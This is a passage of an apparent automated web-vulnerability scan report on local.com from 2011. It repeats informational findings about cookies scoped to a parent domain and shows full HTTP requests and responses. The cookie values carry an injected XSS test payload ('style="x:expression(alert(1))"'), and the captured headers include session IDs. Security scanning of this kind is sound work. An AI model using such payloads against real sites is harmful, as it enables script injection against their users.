Confidence:   Certain
Host:   http://www.local.com
Path:   /business/results/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 132916
Date: Thu, 03 Feb 2011 16:40:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:39:59 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fbusiness%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...

7.14. http://www.local.com/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /contact.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27733
Date: Thu, 03 Feb 2011 16:53:38 GMT
Content-Length: 27733
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...

7.15. http://www.local.com/coupons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coupons/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 103071
Date: Thu, 03 Feb 2011 16:44:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 103071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Coupons in Dallas, TX | Local
...[SNIP]...

7.16. http://www.local.com/coupons/printable/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/printable/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coupons/printable/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 25463
Date: Thu, 03 Feb 2011 16:45:55 GMT
Content-Length: 25463
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:45:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Not Found - Local.com</title>
...[SNIP]...

7.17. http://www.local.com/details/photos/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /details/photos/dallas-tx/amegy-bank-97648000/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 5900
Date: Thu, 03 Feb 2011 16:49:42 GMT
Content-Length: 5900
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:49:42 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...

7.18. http://www.local.com/details/photos/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /details/photos/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 5900
Date: Thu, 03 Feb 2011 16:47:23 GMT
Content-Length: 5900
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:47:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...

7.19. http://www.local.com/details/photos/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /details/photos/dallas-tx/equity-bank-63975058/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 5899
Date: Thu, 03 Feb 2011 16:48:07 GMT
Content-Length: 5899
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:48:07 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...

7.20. http://www.local.com/details/photos/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /details/photos/dallas-tx/hillcrest-bank-104826937/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 5899
Date: Thu, 03 Feb 2011 16:48:35 GMT
Content-Length: 5899
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:48:35 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...

7.21. http://www.local.com/details/photos/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /details/photos/dallas-tx/sterling-bank-16856575/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
